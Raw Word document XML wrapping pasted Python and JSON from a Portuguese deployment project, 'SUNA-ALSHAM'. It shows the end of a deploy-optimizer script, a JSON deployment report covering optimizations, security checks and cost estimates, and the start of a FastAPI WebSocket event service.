    <w:p w14:paraId="639D7F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C21F1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content = "\n".join(requirements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4301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E9F52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with open("requirements_production.txt", 'w') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413338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f.write(content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6516B9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3D5A5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📋</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Requirements gerado: requirements_production.txt")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2629E4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"requirements_production.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30420AF6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70AB45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def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75933A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"""Função principal"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2785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print("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SUNA-ALSHAM Deploy Optimization System")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03396B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print("=" * 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEE10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3F082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optimizer = DeployOptimizer()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBABB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2BB5B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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B35B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Executar otimização</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D4C6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report = optimizer.run_optimization("railway")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C825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D5D36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Salvar relatório</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF821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report_file = optimizer.save_report(report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59291D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95B1C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Gerar configuração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5762C5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config = optimizer.generate_deployment_config("railway")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0342AA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F9CE4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Gerar arquivos de deploy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FDE7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script_file = optimizer.generate_deploy_script(config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179836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requirements_file = optimizer.generate_requirements()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457751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D8B4C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Exibir resumo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FAB3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print("\n" + "=" * 50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B244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print("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RESUMO DA OTIMIZAÇÃO:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5905FD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Status: {report.status}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D19A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Otimiza</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>çõ</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>es: {len(report.optimizations)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D86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</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Segurança: {sum(report.security_checks.values())}/{len(report.security_checks)} checks")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E85A5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</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>💰</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Custo estimado: ${report.estimated_cost['total_monthly']:.2f}/mês")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0829A5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</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⏱️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tempo de otimização: {report.deployment_time:.2f}s")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B4FB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</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📄</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Relatório: {report_file}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A190F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</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📜</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Script: {script_file}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7309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</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📋</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Requirements: {requirements_file}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5147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F4146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Recomendações principais</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662A7E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print("\n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PRINCIPAIS RECOMENDAÇÕES:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0745C8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i, rec in enumerate(report.recommendations[:5], 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3467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print(f"{i}. {rec}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44668D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D42C5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report.status == "READY":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AB03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print("\n</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎉</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SISTEMA PRONTO PARA DEPLOY!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBC5C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212932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print("\n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VERIFICAR ITENS DE SEGURANÇA ANTES DO DEPLOY")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448E66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6058E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report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3AAE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C4B51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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207EA5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print(f"\n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durante otimiza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o: {str(e)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359651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logger.error(f"Erro na otimização: {str(e)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AE7B83" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC53C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__name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA6A1B1" w14:textId="42AD296D" w:rsid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main()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1133E6A4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE814CF" w14:textId="0ADEA5EA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deployment_report.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE254AB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED70A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"timestamp": "2025-07-22T11:36:54.908903",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC242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"platform": "railway",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796CE2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"environment": "production",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6137A3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"status": "NEEDS_ATTENTION",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E96A3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"optimizations": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6407E7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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4C23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"category": "memory",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F361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"optimization": "memory_allocation",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390054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"impact": "HIGH",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB6B4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"before_value": "default",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683492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"after_value": "1GB",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D543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"improvement_percentage": 25.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67928D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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C55F9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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094398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"category": "concurrency",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013DFF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"optimization": "worker_processes",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427DCB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"impact": "HIGH",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEC16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"before_value": 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723631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"after_value": 8,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240915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"improvement_percentage": 400.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B893D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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1433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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4112C7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"category": "cache",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08836A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"optimization": "redis_cache",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3498A5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"impact": "MEDIUM",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0C88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"before_value": "no_cache",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDD54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"after_value": "redis_optimized",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF87B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"improvement_percentage": 40.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AC49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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7C39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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB562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"category": "database",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B991A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"optimization": "connection_pool",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9BF6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"impact": "MEDIUM",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095E9C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"before_value": 5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F1A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"after_value": 20,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD21D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"improvement_percentage": 30.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BCEB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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0898C8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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6847BB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"performance_metrics": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EC80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"memory_usage_mb": 884.64453125,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661A2A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"cpu_usage_percent": 0.7,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CE48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"disk_usage_percent": 19.6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B644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"estimated_throughput": 800,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13772A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"estimated_latency_ms": 50,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DABFA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"cache_hit_rate": 0.85</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A46C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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EC41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"security_checks": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AC4A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"secret_key_set": false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B87D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"debug_disabled": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB63D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"https_enabled": false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1370B3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"rate_limiting_enabled": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A45D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"input_validation_enabled": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA76D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"cors_configured": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1B0D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"logging_enabled": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DF18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"authentication_required": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CE8E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"authorization_implemented": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333FC5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"input_sanitization": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309A49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"output_encoding": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F929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"sql_injection_protection": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AB29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"xss_protection": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F756F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"csrf_protection": true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57425C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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D562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"recommendations": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403D87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"Configure Redis para cache de alta performance",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138253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"Implemente monitoramento com Prometheus/Grafana",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CCC7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"Configure auto-scaling baseado em CPU/memória",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100014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"Implemente health checks robustos",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2258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"Configure backup automático de dados",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AC94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"Implemente rate limiting por IP",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CDE7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"Configure logs estruturados para análise",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173FE0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"Implemente circuit breaker para APIs externas"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089759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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31634E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"estimated_cost": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C80C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"base_cost": 20.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9354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"redis_cost": 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212624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"monitoring_cost": 10.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4322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"backup_cost": 5.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D907A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"total_monthly": 35.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAF92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"total_yearly": 420.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8555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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723594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"deployment_time": 3.1085205078125</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E408DCA" w14:textId="3B961A26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}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD5C888" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DBAD898" w14:textId="54797B59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guard_service.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76423327" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B161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SUNA-ALSHAM: Sistema Unificado Neural Avançado - Arquitetura Transcendental PERFECT 10/10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E6AE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Sistema de 3 agentes auto-evolutivos com dashboard web integrado - VERSÃO DEFINITIVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BBD4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Valor: R$ 1.430.000 (Core: R$ 550k + Guard: R$ 330k + Learn: R$ 550k)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DB58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MELHORIAS: WebSocket + Event Log + Gráficos Empilhados + Drill-Down + Animações + 5 Temas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EE5E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CORREÇÃO: Dashboard HTML integrado (sem redirecionamento externo) + Contador de Ciclos CORRIGIDO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579EB5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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA751E3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73FD5A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asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598EE6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logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2B58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uuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF077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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632B33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json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B62F2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random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFE7C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datetime import datetime, timedelta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570C96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typing import Dict, Any, Optional, List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E447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fastapi import FastAPI, HTTPException, WebSocket, WebSocketDisconnect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A786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fastapi.responses import HTMLResponse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDC89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fastapi.middleware.cors import CORSMiddleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308EB4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uvicorn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAE00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os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47558B49" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37CD3B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Configuração de logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5767B8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logging.basicConfig(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411A4E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level=logging.INFO,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2948A4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format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D30D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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B74CC4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7408D5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# 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CONFIGURA</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ÇÕ</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ES DE ACELERA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 OTIMIZADAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E798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CORE_CYCLE_INTERVAL = 600    # 10 minutos (600 segundos)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCEC5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LEARN_CYCLE_INTERVAL = 600   # 10 minutos (600 segundos)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23739D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GUARD_CHECK_INTERVAL = 300   # 5 minutos (300 segundos)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256358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ACCELERATED_MODE = True      # Modo acelerado ativo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4989BD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73361A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# </w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏆</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CONTADOR GLOBAL DE CICLOS REAIS + EVENT SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA006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EventSystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2B62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"""Sistema de eventos em tempo real para WebSocket"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E734B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829E9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2AF7AC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self.connections: List[WebSocket] = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB46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self.event_log: List[Dict] = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BA77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 = logging.getLogger('event_system')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67894B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1910B1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connect(self, websocket: WebSocket):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306DA0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"""Adiciona nova conexão WebSocket"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BF82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websocket.accept()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660571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self.connections.append(websocket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CFEF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self.logger.info(f"Nova conexão WebSocket: {len(self.connections)} ativas")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B5A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F4C19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disconnect(self, websocket: WebSocket):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3570AB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"""Remove conexão WebSocket"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7C8A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websocket in self.connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE3E4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self.connections.remove(websocket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BF33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self.logger.info(f"Conexão removida: {len(self.connections)} ativas")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79235E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CF0A9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broadcast_event(self, event: Dict):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B04E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"""Transmite evento para todas as conexões"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C579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self.event_log.append({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC611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**event,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA211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'timestamp': datetime.now().isoformat(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C2B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'id': str(uuid.uuid4())[:8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ACEF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335E46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2C5D5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Manter apenas últimos 50 eventos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8A82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len(self.event_log) &gt; 50:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAEE6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self.event_log = self.event_log[-50:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DC3D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A20CF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Transmitir para todas as conexões ativas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C774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self.connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DB53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disconnected = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E166A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connection in self.connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF1B1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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F345D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await connection.send_json(event)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F254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except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699CD9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disconnected.append(connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415E18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1EEED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Remover conexões mortas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56136F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conn in disconnected:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BAC5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self.disconnect(conn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123A5B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3D0CD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get_recent_events(self, limit: int = 20):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6DDC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eventos recentes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC058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self.event_log[-limit:]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5721EDC5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAB8A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# </w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏆</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CONTADOR GLOBAL DE CICLOS REAIS APRIMORADO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDD60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CycleCounter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDC7C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"""Contador global de todos os ciclos executados pelo sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA9C5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209FE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__init__(self, event_system: EventSystem):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C7B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self.start_time = datetime.now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46924E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self.total_cycles = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E310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self.core_cycles = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2303DE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self.learn_cycles = 0</w:t>
      </w:r>
    </w:p>
